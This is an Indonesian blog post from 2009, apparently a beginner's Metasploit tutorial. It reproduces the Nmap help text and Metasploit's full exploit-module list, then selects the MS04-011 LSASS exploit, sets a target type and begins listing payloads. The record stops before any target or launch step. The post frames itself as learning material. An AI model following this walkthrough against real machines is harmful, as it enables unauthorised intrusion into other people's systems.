hacker Pictures, Images and Photos Black_Cane: Metasploit
Image Hosted by ImageShack.us

janganlah merasa bangga dengan apa yang kau dapatkan. diatas langit masih ada langit

Sabtu, 31 Oktober 2009

Metasploit

salam semua,
semoga hari ini makin indah. makasih dah mapir ke blog ku.

penjelasan tentang metasploit------> monggo ---->
sebelum saya jelaskan tentang penggunaan metasploit 3.2(versi terbaru) dengan gabungan namp (dipergunakan untuk scan port yang terbuka).
bagi yang belum tahu kegunaan metas monggo di cari di mbah Google
mohon jangan disalah gunakan untuk yang macam2, anggaplah ini untuk sebagai pembelajaran/pengetahuan dll. yang pnting tidak merugikan pihak lain. terima kasih.
bagi yang tidak asing dengan metas, monggo keliling, cari tutor lain di blog ini mugkin anda belum mencoba yang ini yang itu terserah, kalau sudah semua. terimakasih. kakean bacot.......

oke kita lanjutkan. to the point .....
sebelumna siapkan kopi + rokok..... (terserah rokok apa kek, yang penting keluar asap, knalpot boleh juga tuh, nek doyan).

selanjutna,
install metas na dulu.... bagi yang sudah punya software, bagi yang belum punya:....... nih situs na (http://www.metasploit.com). download dulu bro besarna cuman 36.7 mb,
oke,......
kalau sudah diinstall biasana langsung keluar otomatis tu aplikasina bro.
sebelum na buka cmd dulu (dos) guna kita melihat port yang terbuka. yaitu dengan Nmap.

nih contoh na........
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Documents and Settings\By_dit>nmap
Nmap 4.76 ( http://nmap.org )
Usage: nmap [Scan Type(s)] [Options] {target specification}
TARGET SPECIFICATION:
Can pass hostnames, IP addresses, networks, etc.
Ex: scanme.nmap.org, microsoft.com/24, 192.168.0.1; 10.0.0-255.1-254
-iL : Input from list of hosts/networks
-iR : Choose random targets
--exclude : Exclude hosts/networks
--excludefile : Exclude list from file
HOST DISCOVERY:
-sL: List Scan - simply list targets to scan
-sP: Ping Scan - go no further than determining if host is online
-PN: Treat all hosts as online -- skip host discovery
-PS/PA/PU [portlist]: TCP SYN/ACK or UDP discovery to given ports
-PE/PP/PM: ICMP echo, timestamp, and netmask request discovery probes
-PO [protocol list]: IP Protocol Ping
-n/-R: Never do DNS resolution/Always resolve [default: sometimes]
--dns-servers : Specify custom DNS servers
--system-dns: Use OS's DNS resolver
SCAN TECHNIQUES:
-sS/sT/sA/sW/sM: TCP SYN/Connect()/ACK/Window/Maimon scans
-sU: UDP Scan
-sN/sF/sX: TCP Null, FIN, and Xmas scans
--scanflags : Customize TCP scan flags
-sI : Idle scan
-sO: IP protocol scan
-b : FTP bounce scan
--traceroute: Trace hop path to each host
--reason: Display the reason a port is in a particular state
PORT SPECIFICATION AND SCAN ORDER:
-p : Only scan specified ports
Ex: -p22; -p1-65535; -p U:53,111,137,T:21-25,80,139,8080
-F: Fast mode - Scan fewer ports than the default scan
-r: Scan ports consecutively - don't randomize
--top-ports : Scan most common ports
--port-ratio : Scan ports more common than
SERVICE/VERSION DETECTION:
-sV: Probe open ports to determine service/version info
--version-intensity : Set from 0 (light) to 9 (try all probes)
--version-light: Limit to most likely probes (intensity 2)
--version-all: Try every single probe (intensity 9)
--version-trace: Show detailed version scan activity (for debugging)
SCRIPT SCAN:
-sC: equivalent to --script=default
--script=: is a comma separated list of
directories, script-files or script-categories
--script-args=: provide arguments to scripts
--script-trace: Show all data sent and received
--script-updatedb: Update the script database.
OS DETECTION:
-O: Enable OS detection
--osscan-limit: Limit OS detection to promising targets
--osscan-guess: Guess OS more aggressively
TIMING AND PERFORMANCE:
Options which take

____________

<>

------------

\ ,__,

\ (oo)____

(__) )\

||--|| *

=[ msf v3.2-release

+ -- --=[ 320 exploits - 217 payloads

+ -- --=[ 20 encoders - 6 nops

=[ 99 aux

msf > show exploits

Exploits

========

Name Description

---- -----------

bsdi/softcart/mercantec_softcart Mercantec SoftCart CGI Overflow

freebsd/tacacs/xtacacsd_report XTACACSD <= 4.1.2 report() Buffer Overflow

hpux/lpd/cleanup_exec HP-UX LPD Command Execution

irix/lpd/tagprinter_exec Irix LPD tagprinter Command Execution

linux/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Linux)

linux/http/gpsd_format_string Berlios GPSD Format String Vulnerability

linux/http/linksys_apply_cgi Linksys apply.cgi buffer overflow

linux/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (linux)

linux/ids/snortbopre Snort Back Orifice Pre-Preprocessor Remote Exploit

linux/imap/imap_uw_lsub UoW IMAP server LSUB Buffer Overflow

linux/madwifi/madwifi_giwscan_cb Madwifi SIOCGIWSCAN Buffer Overflow

linux/misc/gld_postfix GLD (Greylisting Daemon) Postfix Buffer Overflow

linux/misc/ib_inet_connect Borland InterBase INET_connect() Buffer Overflow

linux/misc/ib_jrd8_create_database Borland InterBase jrd8_create_database() Buffer Overflow

linux/misc/ib_open_marker_file Borland InterBase open_marker_file() Buffer Overflow

linux/misc/ib_pwd_db_aliased Borland InterBase PWD_db_aliased() Buffer Overflow

linux/mysql/mysql_yassl MySQL yaSSL SSL Hello Message Buffer Overflow

linux/pptp/poptop_negative_read Poptop Negative Read Overflow

linux/proxy/squid_ntlm_authenticate Squid NTLM Authenticate Overflow

linux/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow

multi/browser/firefox_queryinterface Firefox location.QueryInterface() Code Execution

multi/browser/mozilla_compareto Mozilla Suite/Firefox InstallVersion->compareTo() Code Execution

multi/browser/mozilla_navigatorjava Mozilla Suite/Firefox Navigator Object Code Execution

multi/browser/qtjava_pointer Apple QTJava toQTPointer() Arbitrary Memory Access

multi/handler Generic Payload Handler

multi/misc/openview_omniback_exec HP OpenView OmniBack II Command Execution

multi/misc/veritas_netbackup_cmdexec VERITAS NetBackup Remote Command Execution

multi/ntp/ntp_overflow NTP daemon readvar Buffer Overflow

multi/php/php_unserialize_zval_cookie PHP 4 unserialize() ZVAL Reference Counter Overflow (Cookie)

multi/realserver/describe RealServer Describe Buffer Overflow

multi/samba/nttrans Samba nttrans Overflow

multi/svn/svnserve_date Subversion Date Svnserve

netware/smb/lsass_cifs Novell NetWare LSASS CIFS.NLM Driver Stack Overflow

osx/afp/loginext AppleFileServer LoginExt PathName Overflow

osx/arkeia/type77 Arkeia Backup Client Type 77 Overflow (Mac OS X)

osx/armle/safari_libtiff iPhone MobileSafari LibTIFF Buffer Overflow

osx/browser/safari_libtiff iPhone MobileSafari LibTIFF Buffer Overflow

osx/browser/safari_metadata_archive Safari Archive Metadata Command Execution

osx/browser/software_update Apple OS X Software Update Command Execution

osx/email/mailapp_image_exec Mail.app Image Attachment Command Execution

osx/email/mobilemail_libtiff iPhone MobileMail LibTIFF Buffer Overflow

osx/ftp/webstar_ftp_user WebSTAR FTP Server USER Overflow

osx/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow

osx/samba/trans2open Samba trans2open Overflow (Mac OS X)

solaris/dtspcd/heap_noir Solaris dtspcd Heap Overflow

solaris/lpd/sendmail_exec Solaris LPD Command Execution

solaris/samba/lsa_transnames_heap Samba lsa_io_trans_names Heap Overflow

solaris/samba/trans2open Samba trans2open Overflow (Solaris SPARC)

solaris/sunrpc/sadmind_adm_build_path Sun Solaris sadmind adm_build_path() Buffer Overflow

solaris/sunrpc/sadmind_exec Solaris sadmind Command Execution

solaris/sunrpc/ypupdated_exec Solaris ypupdated Command Execution

solaris/telnet/fuser Sun Solaris Telnet Remote Authentication Bypass Vulnerability

solaris/telnet/ttyprompt Solaris in.telnetd TTYPROMPT Buffer Overflow

test/aggressive Internal Aggressive Test Exploit

test/exploitme MIPS Aggressive Test Exploit

test/kernel Internal Kernel-mode Test Exploit

unix/misc/distcc_exec DistCC Daemon Command Execution

unix/misc/spamassassin_exec SpamAssassin spamd Remote Command Execution

unix/smtp/clamav_milter_blackhole ClamAV Milter Blackhole-Mode Remote Code Execution

unix/webapp/awstats_configdir_exec AWStats configdir Remote Command Execution

unix/webapp/barracuda_img_exec Barracuda IMG.PL Remote Command Execution

unix/webapp/cacti_graphimage_exec Cacti graph_view.php Remote Command Execution

unix/webapp/google_proxystylesheet_exec Google Appliance ProxyStyleSheet Command Execution

unix/webapp/guestbook_ssi_exec Matt Wright guestbook.pl Arbitrary Command Execution

unix/webapp/openview_connectednodes_exec HP Openview connectedNodes.ovpl Remote Command Execution

unix/webapp/pajax_remote_exec PAJAX Remote Command Execution

unix/webapp/php_eval Generic PHP Code eval

unix/webapp/php_include PHP Include Generic Exploit

unix/webapp/php_vbulletin_template vBulletin misc.php Template Name Arbitrary Code Execution

unix/webapp/php_wordpress_lastpost WordPress cache_lastpostdate Arbitrary Code Execution

unix/webapp/php_xmlrpc_eval PHP XML-RPC Arbitrary Code Execution

unix/webapp/phpbb_highlight phpBB viewtopic.php Arbitrary Code Execution

unix/webapp/sphpblog_file_upload Simple PHP Blog <= 0.4.0 Remote Command Execution

unix/webapp/squirrelmail_pgp_plugin SquirrelMail PGP Plugin command execution (SMTP)

windows/antivirus/symantec_rtvscan Symantec Remote Management Buffer Overflow

windows/antivirus/trendmicro_serverprotect Trend Micro ServerProtect 5.58 Buffer Overflow

windows/antivirus/trendmicro_serverprotect_createbinding Trend Micro ServerProtect 5.58 CreateBinding() Buffer Overflow

windows/antivirus/trendmicro_serverprotect_earthagent Trend Micro ServerProtect 5.58 EarthAgent.EXE Buffer Overflow

windows/arkeia/type77 Arkeia Backup Client Type 77 Overflow (Win32)

windows/backupexec/name_service Veritas Backup Exec Name Service Overflow

windows/backupexec/remote_agent Veritas Backup Exec Windows Remote Agent Overflow

windows/brightstor/discovery_tcp CA BrightStor Discovery Service TCP Overflow

windows/brightstor/discovery_udp CA BrightStor Discovery Service Overflow

windows/brightstor/etrust_itm_alert Computer Associates Alert Notification Buffer Overflow

windows/brightstor/hsmserver CA BrightStor HSM Buffer Overflow

windows/brightstor/lgserver CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow

windows/brightstor/lgserver_rxrlogin CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow

windows/brightstor/lgserver_rxsuselicenseini CA BrightStor ARCserve for Laptops & Desktops LGServer Buffer Overflow

windows/brightstor/mediasrv_sunrpc CA BrightStor ArcServe Media Service Stack Overflow

windows/brightstor/message_engine CA BrightStor ARCserve Message Engine Buffer Overflow

windows/brightstor/message_engine_heap CA BrightStor ARCserve Message Engine Heap Overflow

windows/brightstor/sql_agent CA BrightStor Agent for Microsoft SQL Overflow

windows/brightstor/tape_engine CA BrightStor ARCserve Tape Engine Buffer Overflow

windows/brightstor/universal_agent CA BrightStor Universal Agent Overflow

windows/browser/aim_goaway AOL Instant Messenger goaway Overflow

windows/browser/ani_loadimage_chunksize Windows ANI LoadAniIcon() Chunk Size Stack Overflow (HTTP)

windows/browser/apple_itunes_playlist Apple ITunes 4.7 Playlist Buffer Overflow

windows/browser/apple_quicktime_rtsp Apple QuickTime 7.1.3 RTSP URI Buffer Overflow

windows/browser/ask_shortformat Ask.com Toolbar askBar.dll ActiveX Control Buffer Overflow

windows/browser/bearshare_setformatlikesample BearShare 6 ActiveX Control Buffer Overflow

windows/browser/creative_software_cachefolder Creative Software AutoUpdate Engine ActiveX Control Buffer Overflow

windows/browser/enjoysapgui_preparetoposthtml EnjoySAP SAP GUI ActiveX Control Buffer Overflow

windows/browser/facebook_extractiptc Facebook Photo Uploader 4 ActiveX Control Buffer Overflow

windows/browser/gom_openurl GOM Player ActiveX Control Buffer Overflow

windows/browser/hploadrunner HP LoadRunner 9.0 ActiveX Buffer Overflow

windows/browser/hpmqc_progcolor HP Mercury Quality Center ActiveX Control ProgColor Buffer Overflow

windows/browser/ibmlotusdomino_dwa_uploadmodule IBM Lotus Domino Web Access Upload Module Buffer Overflow

windows/browser/ie_createobject Internet Explorer COM CreateObject Code Execution

windows/browser/ie_iscomponentinstalled Internet Explorer isComponentInstalled Overflow

windows/browser/kazaa_altnet_heap Kazaa Altnet Download Manager ActiveX Control Buffer Overflow

windows/browser/logitechvideocall_start Logitech VideoCall ActiveX Control Buffer Overflow

windows/browser/lpviewer_url iseemedia / Roxio / MGI Software LPViewer ActiveX Control Buffer Overflow

windows/browser/macrovision_downloadandexecute Macrovision InstallShield Update Service Buffer Overflow

windows/browser/macrovision_unsafe Macrovision InstallShield Update Service ActiveX Unsafe Method

windows/browser/mcafee_mcsubmgr_vsprintf McAfee Subscription Manager Stack Overflow

windows/browser/mcafeevisualtrace_tracetarget McAfee Visual Trace ActiveX Control Buffer Overflow

windows/browser/mirc_irc_url mIRC IRC URL Buffer Overflow

windows/browser/ms03_020_ie_objecttype MS03-020 Internet Explorer Object Type

windows/browser/ms06_001_wmf_setabortproc Windows XP/2003/Vista Metafile Escape() SetAbortProc Code Execution

windows/browser/ms06_013_createtextrange Internet Explorer createTextRange() Code Execution

windows/browser/ms06_055_vml_method Internet Explorer VML Fill Method Code Execution

windows/browser/ms06_057_webview_setslice Internet Explorer WebViewFolderIcon setSlice() Overflow

windows/browser/ms06_067_keyframe Internet Explorer Daxctle.OCX KeyFrame Method Heap Buffer Overflow Vulnerability

windows/browser/ms06_071_xml_core Internet Explorer XML Core Services HTTP Request Handling

windows/browser/ms08_041_snapshotviewer Snapshot Viewer for Microsoft Access ActiveX Control Arbitrary File Download

windows/browser/ms08_053_mediaencoder Windows Media Encoder 9 wmex.dll ActiveX Buffer Overflow

windows/browser/nis2004_get Symantec Norton Internet Security 2004 ActiveX Control Buffer Overflow

windows/browser/novelliprint_executerequest Novell iPrint Client ActiveX Control Buffer Overflow

windows/browser/novelliprint_getdriversettings Novell iPrint Client ActiveX Control Buffer Overflow

windows/browser/realplayer_console RealPlayer rmoc3260.dll ActiveX Control Heap Corruption

windows/browser/realplayer_import RealPlayer ierpplug.dll ActiveX Control Playlist Name Buffer Overflow

windows/browser/realplayer_smil RealNetworks RealPlayer SMIL Buffer Overflow

windows/browser/softartisans_getdrivename SoftArtisans XFile FileManager ActiveX Control Buffer Overflow

windows/browser/sonicwall_addrouteentry SonicWall SSL-VPN NetExtender ActiveX Control Buffer Overflow

windows/browser/symantec_backupexec_pvcalendar Symantec BackupExec Calendar Control Buffer Overflow

windows/browser/systemrequirementslab_unsafe Husdawg, LLC. System Requirements Lab ActiveX Unsafe Method

windows/browser/trendmicro_officescan Trend Micro OfficeScan Client ActiveX Control Buffer Overflow

windows/browser/tumbleweed_filetransfer Tumbleweed FileTransfer vcst_eu.dll ActiveX Control Buffer Overflow

windows/browser/winamp_playlist_unc Winamp Playlist UNC Path Computer Name Overflow

windows/browser/winamp_ultravox Winamp Ultravox Streaming Metadata (in_mp3.dll) Buffer Overflow

windows/browser/windvd7_applicationtype WinDVD7 IASystemInfo.DLL ActiveX Control Buffer Overflow

windows/browser/xmplay_asx XMPlay 3.3.0.4 (ASX Filename) Buffer Overflow

windows/browser/yahoomessenger_fvcom Yahoo! Messenger YVerInfo.dll ActiveX Control Buffer Overflow

windows/browser/yahoomessenger_server Yahoo! Messenger 8.1.0.249 ActiveX Control Buffer Overflow

windows/browser/zenturiprogramchecker_unsafe Zenturi ProgramChecker ActiveX Control Arbitrary File Download.

windows/dcerpc/ms03_026_dcom Microsoft RPC DCOM Interface Overflow

windows/dcerpc/ms05_017_msmq Microsoft Message Queueing Service Path Overflow

windows/dcerpc/ms07_065_msmq Microsoft Message Queueing Service DNS Name Path Overflow

windows/dcerpc/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (TCP)

windows/driver/broadcom_wifi_ssid Broadcom Wireless Driver Probe Response SSID Overflow

windows/driver/dlink_wifi_rates D-Link DWL-G132 Wireless Driver Beacon Rates Overflow

windows/driver/netgear_wg111_beacon NetGear WG111v2 Wireless Driver Long Beacon Overflow

windows/email/ani_loadimage_chunksize Windows ANI LoadAniIcon() Chunk Size Stack Overflow (SMTP)

windows/emc/alphastor_agent EMC AlphaStor Agent Buffer Overflow

windows/firewall/blackice_pam_icq ISS PAM.dll ICQ Parser Buffer Overflow

windows/firewall/kerio_auth Kerio Firewall 2.1.4 Authentication Packet Overflow

windows/ftp/3cdaemon_ftp_user 3Com 3CDaemon 2.0 FTP Username Overflow

windows/ftp/cesarftp_mkd Cesar FTP 0.99g MKD Command Buffer Overflow

windows/ftp/dreamftp_format BolinTech Dream FTP Server 1.02 Format String

windows/ftp/easyfilesharing_pass Easy File Sharing FTP Server 2.0 PASS Overflow

windows/ftp/filecopa_list_overflow FileCopa FTP Server pre 18 Jul Version

windows/ftp/freeftpd_key_exchange FreeFTPd 1.0.10 Key Exchange Algorithm String Buffer Overflow

windows/ftp/freeftpd_user freeFTPd 1.0 Username Overflow

windows/ftp/globalscapeftp_input GlobalSCAPE Secure FTP Server Input Overflow

windows/ftp/leapftp_pasv_reply LeapWare LeapFTP v2.7.3.600 PASV Reply Client Overflow

windows/ftp/netterm_netftpd_user NetTerm NetFTPD USER Buffer Overflow

windows/ftp/oracle9i_xdb_ftp_pass Oracle 9i XDB FTP PASS Overflow (win32)

windows/ftp/oracle9i_xdb_ftp_unlock Oracle 9i XDB FTP UNLOCK Overflow (win32)

windows/ftp/sami_ftpd_user KarjaSoft Sami FTP Server v2.02 USER Overflow

windows/ftp/sasser_ftpd_port Sasser Worm avserve FTP PORT Buffer Overflow

windows/ftp/servu_mdtm Serv-U FTPD MDTM Overflow

windows/ftp/slimftpd_list_concat SlimFTPd LIST Concatenation Overflow

windows/ftp/warftpd_165_pass War-FTPD 1.65 Password Overflow

windows/ftp/warftpd_165_user War-FTPD 1.65 Username Overflow

windows/ftp/wftpd_size Texas Imperial Software WFTPD 3.23 SIZE Overflow

windows/ftp/wsftp_server_503_mkd WS-FTP Server 5.03 MKD Overflow

windows/ftp/wsftp_server_505_xmd5 Ipswitch WS_FTP Server 5.05 XMD5 Overflow

windows/games/mohaa_getinfo Medal Of Honor Allied Assault getinfo Stack Overflow

windows/games/ut2004_secure Unreal Tournament 2004 "secure" Overflow (Win32)

windows/http/altn_webadmin Alt-N WebAdmin USER Buffer Overflow

windows/http/apache_chunked Apache Win32 Chunked Encoding

windows/http/apache_modjk_overflow Apache mod_jk 1.2.20 Buffer Overflow

windows/http/badblue_ext_overflow BadBlue 2.5 EXT.dll Buffer Overflow

windows/http/badblue_passthru BadBlue 2.72b PassThru Buffer Overflow

windows/http/bea_weblogic_transfer_encoding BEA Weblogic Transfer-Encoding Buffer Overflow

windows/http/ca_igateway_debug CA iTechnology iGateway Debug Mode Buffer Overflow

windows/http/edirectory_host Novell eDirectory NDS Server Host Header Overflow

windows/http/edirectory_imonitor eDirectory 8.7.3 iMonitor Remote Stack Overflow

windows/http/hp_nnm HP OpenView Network Node Manager CGI Buffer Overflow

windows/http/ia_webmail IA WebMail 3.x Buffer Overflow

windows/http/ibm_tpmfosd_overflow IBM TPM for OS Deployment 5.1.0.x rembo.exe Buffer Overflow

windows/http/ibm_tsm_cad IBM Tivoli Storage Manager Express CAD Service Buffer Overflow

windows/http/icecast_header Icecast (<= 2.0.1) Header Overwrite (win32)

windows/http/ipswitch_wug_maincfgret Ipswitch WhatsUp Gold 8.03 Buffer Overflow

windows/http/mailenable_auth_header MailEnable Authorization Header Buffer Overflow

windows/http/maxdb_webdbm_database MaxDB WebDBM Database Parameter Overflow

windows/http/maxdb_webdbm_get_overflow MaxDB WebDBM GET Buffer Overflow

windows/http/mcafee_epolicy_source McAfee ePolicy Orchestrator / ProtectionPilot Overflow

windows/http/minishare_get_overflow Minishare 1.4.1 Buffer Overflow

windows/http/navicopa_get_overflow NaviCOPA 2.0.1 URL Handling Buffer Overflow

windows/http/novell_messenger_acceptlang Novell Messenger Server 2.0 Accept-Language Overflow

windows/http/nowsms Now SMS/MMS Gateway Buffer Overflow

windows/http/oracle9i_xdb_pass Oracle 9i XDB HTTP PASS Overflow (win32)

windows/http/peercast_url PeerCast <= 0.1216 URL Handling Buffer Overflow (win32)

windows/http/privatewire_gateway Private Wire Gateway Buffer Overflow

windows/http/psoproxy91_overflow PSO Proxy v0.91 Stack Overflow

windows/http/sapdb_webtools SAP DB 7.4 WebTools Buffer Overflow

windows/http/savant_31_overflow Savant 3.1 Web Server Overflow

windows/http/shoutcast_format SHOUTcast DNAS/win32 1.9.4 File Request Format String Overflow

windows/http/shttpd_post SHTTPD <= 1.34 URI-Encoded POST Request Overflow (win32)

windows/http/sybase_easerver Sybase EAServer 5.2 Remote Stack Overflow

windows/http/trackercam_phparg_overflow TrackerCam PHP Argument Buffer Overflow

windows/http/trendmicro_officescan Trend Micro OfficeScan Remote Stack Overflow

windows/http/xitami_if_mod_since Xitami 2.5c2 Web Server If-Modified-Since Overflow

windows/iis/ms01_023_printer Microsoft IIS 5.0 Printer Host Header Overflow

windows/iis/ms01_033_idq Microsoft IIS 5.0 IDQ Path Overflow

windows/iis/ms02_018_htr Microsoft IIS 4.0 .HTR Path Overflow

windows/iis/ms03_007_ntdll_webdav Microsoft IIS 5.0 WebDAV ntdll.dll Path Overflow

windows/imap/eudora_list Qualcomm WorldMail 3.0 IMAPD LIST Buffer Overflow

windows/imap/imail_delete IMail IMAP4D Delete Overflow

windows/imap/ipswitch_search Ipswitch IMail IMAP SEARCH Buffer Overflow

windows/imap/mailenable_login MailEnable IMAPD (2.35) Login Request Buffer Overflow

windows/imap/mailenable_status MailEnable IMAPD (1.54) STATUS Request Buffer Overflow

windows/imap/mailenable_w3c_select MailEnable IMAPD W3C Logging Buffer Overflow

windows/imap/mdaemon_cram_md5 Mdaemon 8.0.3 IMAPD CRAM-MD5 Authentication Overflow

windows/imap/mdaemon_fetch MDaemon 9.6.4 IMAPD FETCH Buffer Overflow

windows/imap/mercur_imap_select_overflow Mercur v5.0 IMAP SP3 SELECT Buffer Overflow

windows/imap/mercur_login Mercur Messaging 2005 IMAP Login Buffer Overflow

windows/imap/mercury_login Mercury/32 <= 4.01b LOGIN Buffer Overflow

windows/imap/mercury_rename Mercury/32 v4.01a IMAP RENAME Buffer Overflow

windows/imap/novell_netmail_append Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow

windows/imap/novell_netmail_auth Novell NetMail <=3.52d IMAP AUTHENTICATE Buffer Overflow

windows/imap/novell_netmail_status Novell NetMail <= 3.52d IMAP STATUS Buffer Overflow

windows/imap/novell_netmail_subscribe Novell NetMail <= 3.52d IMAP SUBSCRIBE Buffer Overflow

windows/isapi/fp30reg_chunked Microsoft IIS ISAPI FrontPage fp30reg.dll Chunked Overflow

windows/isapi/ms00_094_pbserver Microsoft IIS Phone Book Service Overflow

windows/isapi/nsiislog_post Microsoft IIS ISAPI nsiislog.dll ISAPI POST Overflow

windows/isapi/rsa_webagent_redirect Microsoft IIS ISAPI RSA WebAgent Redirect Overflow

windows/isapi/w3who_query Microsoft IIS ISAPI w3who.dll Query String Overflow

windows/ldap/imail_thc IMail LDAP Service Buffer Overflow

windows/license/sentinel_lm7_udp SentinelLM UDP Buffer Overflow

windows/lotus/domino_sametime_stmux Lotus Domino Sametime STMux.exe Stack Overflow

windows/lpd/hummingbird_exceed Hummingbird Connectivity 10 SP5 LPD Buffer Overflow

windows/lpd/niprint NIPrint LPD Request Overflow

windows/lpd/saplpd SAP SAPLPD 6.28 Buffer Overflow

windows/lpd/wincomlpd_admin WinComLPD <= 3.0.2 Buffer Overflow

windows/misc/apple_quicktime_rtsp_response Apple QuickTime 7.3 RTSP Response Header Buffer Overflow

windows/misc/asus_dpcproxy_overflow Asus Dpcproxy Buffer Overflow

windows/misc/bakbone_netvault_heap BakBone NetVault Remote Heap Overflow

windows/misc/bigant_server BigAnt Server 2.2 Buffer Overflow

windows/misc/bomberclone_overflow Bomberclone 0.11.6 Buffer Overflow

windows/misc/borland_interbase Borland Interbase Create-Request Buffer Overflow

windows/misc/borland_starteam Borland CaliberRM StarTeam Multicast Service Buffer Overflow

windows/misc/doubletake DoubleTake/HP StorageWorks Storage Mirroring Service Authentication Overflow

windows/misc/eiqnetworks_esa eIQNetworks ESA License Manager LICMGR_ADDLICENSE Overflow

windows/misc/eiqnetworks_esa_topology eIQNetworks ESA Topology DELETEDEVICE Overflow

windows/misc/fb_isc_attach_database Firebird Relational Database isc_attach_database() Buffer Overflow

windows/misc/fb_isc_create_database Firebird Relational Database isc_create_database() Buffer Overflow

windows/misc/fb_svc_attach Firebird Relational Database SVC_attach() Buffer Overflow

windows/misc/hp_ovtrace HP OpenView Operations OVTrace Buffer Overflow

windows/misc/ib_isc_attach_database Borland InterBase isc_attach_database() Buffer Overflow

windows/misc/ib_isc_create_database Borland InterBase isc_create_database() Buffer Overflow

windows/misc/ib_svc_attach Borland InterBase SVC_attach() Buffer Overflow

windows/misc/landesk_aolnsrvr LANDesk Management Suite 8.7 Alert Service Buffer Overflow

windows/misc/mercury_phonebook Mercury/32 <= v4.01b PH Server Module Buffer Overflow

windows/misc/ms07_064_sami Microsoft DirectX DirectShow SAMI Buffer Overflow

windows/misc/netcat110_nt Netcat v1.10 NT Stack Overflow

windows/misc/shixxnote_font ShixxNOTE 6.net Font Field Overflow

windows/misc/tiny_identd_overflow TinyIdentD 2.2 Stack Overflow

windows/misc/windows_rsh Windows RSH daemon Buffer Overflow

windows/mssql/ms02_039_slammer Microsoft SQL Server Resolution Overflow

windows/mssql/ms02_056_hello Microsoft SQL Server Hello Overflow

windows/mysql/mysql_yassl MySQL yaSSL SSL Hello Message Buffer Overflow

windows/nntp/ms05_030_nntp Microsoft Outlook Express NNTP Response Parsing Buffer Overflow

windows/novell/groupwisemessenger_client Novell GroupWise Messenger Client Buffer Overflow

windows/novell/nmap_stor Novell NetMail <= 3.52d NMAP STOR Buffer Overflow

windows/novell/zenworks_desktop_agent Novell ZENworks 6.5 Desktop/Server Management Overflow

windows/pop3/seattlelab_pass Seattle Lab Mail 5.5 POP3 Buffer Overflow

windows/proxy/bluecoat_winproxy_host Blue Coat WinProxy Host Header Overflow

windows/proxy/ccproxy_telnet_ping CCProxy <= v6.2 Telnet Proxy Ping Overflow

windows/proxy/proxypro_http_get Proxy-Pro Professional GateKeeper 4.7 GET Request Overflow

windows/scada/realwin DATAC RealWin SCADA Server Buffer Overflow

windows/sip/aim_triton_cseq AIM Triton 1.0.4 CSeq Buffer Overflow

windows/sip/sipxezphone_cseq SIPfoundry sipXezPhone 0.35a CSeq Field Overflow

windows/sip/sipxphone_cseq SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow

windows/smb/ms03_049_netapi Microsoft Workstation Service NetAddAlternateComputerName Overflow

windows/smb/ms04_007_killbill Microsoft ASN.1 Library Bitstring Heap Overflow

windows/smb/ms04_011_lsass Microsoft LSASS Service DsRolerUpgradeDownlevelServer Overflow

windows/smb/ms04_031_netdde Microsoft NetDDE Service Overflow

windows/smb/ms05_039_pnp Microsoft Plug and Play Service Overflow

windows/smb/ms06_025_rasmans_reg Microsoft RRAS Service RASMAN Registry Overflow

windows/smb/ms06_025_rras Microsoft RRAS Service Overflow

windows/smb/ms06_040_netapi Microsoft Server Service NetpwPathCanonicalize Overflow

windows/smb/ms06_066_nwapi Microsoft Services MS06-066 nwapi32.dll

windows/smb/ms06_066_nwwks Microsoft Services MS06-066 nwwks.dll

windows/smb/ms08_067_netapi Microsoft Server Service Relative Path Stack Corruption

windows/smb/msdns_zonename Microsoft DNS RPC Service extractQuotedChar() Overflow (SMB)

windows/smb/psexec Microsoft Windows Authenticated User Code Execution

windows/smb/smb_relay Microsoft Windows SMB Relay Code Execution

windows/smtp/mailcarrier_smtp_ehlo TABS MailCarrier v2.51 SMTP EHLO Overflow

windows/smtp/mercury_cram_md5 Mercury Mail SMTP AUTH CRAM-MD5 Buffer Overflow

windows/smtp/wmailserver SoftiaCom WMailserver 1.0 Buffer Overflow

windows/smtp/ypops_overflow1 YPOPS 0.6 Buffer Overflow

windows/ssh/freesshd_key_exchange FreeSSHd 1.0.9 Key Exchange Algorithm String Buffer Overflow

windows/ssh/putty_msg_debug PuTTy.exe <= v0.53 Buffer Overflow

windows/ssh/securecrt_ssh1 SecureCRT <= 4.0 Beta 2 SSH1 Buffer Overflow

windows/ssl/ms04_011_pct Microsoft Private Communications Transport Overflow

windows/telnet/gamsoft_telsrv_username GAMSoft TelSrv 1.5 Username Buffer Overflow

windows/telnet/goodtech_telnet GoodTech Telnet Server <= 5.0.6 Buffer Overflow

windows/tftp/attftp_long_filename Allied Telesyn TFTP Server 1.9 Long Filename Overflow

windows/tftp/futuresoft_transfermode FutureSoft TFTP Server 2000 Transfer-Mode Overflow

windows/tftp/quick_tftp_pro_mode Quick FTP Pro 2.1 Transfer-Mode Overflow

windows/tftp/tftpd32_long_filename TFTPD32 <= 2.21 Long Filename Buffer Overflow

windows/tftp/tftpdwin_long_filename TFTPDWIN v0.4.2 Long Filename Buffer Overflow

windows/tftp/threectftpsvc_long_mode 3CTftpSvc TFTP Long Mode Buffer Overflow

windows/unicenter/cam_log_security CA CAM log_security() Stack Overflow (Win32)

windows/vnc/realvnc_client RealVNC 3.3.7 Client Buffer Overflow

windows/vnc/ultravnc_client UltraVNC 1.0.1 Client Buffer Overflow

windows/vnc/winvnc_http_get WinVNC Web Server <= v3.3.3r7 GET Overflow

windows/wins/ms04_045_wins Microsoft WINS Service Memory Overwrite

msf > use windows/smb/ms04_011_lsass

msf exploit(ms04_011_lsass) > set target 2

target => 2

msf exploit(ms04_011_lsass) > show payloads

Compatible payloads

===================

Name Description

---- -----------

generic/debug_trap Generic x86 Debug Trap

generic/debug_trap/bind_ipv6_tcp Generic x86 Debug Trap, Bind TCP Stager (IPv6)

generic/debug_trap/bind_nonx_tcp Generic x86 Debug Trap, Bind TCP Stager (No NX Support)

generic/debug_trap/bind_tcp Generic x86 Debug Trap, Bind TCP Stager

generic/debug_trap/reverse_http Generic x86 Debug Trap, PassiveX Reverse HTTP Tunneling Stager

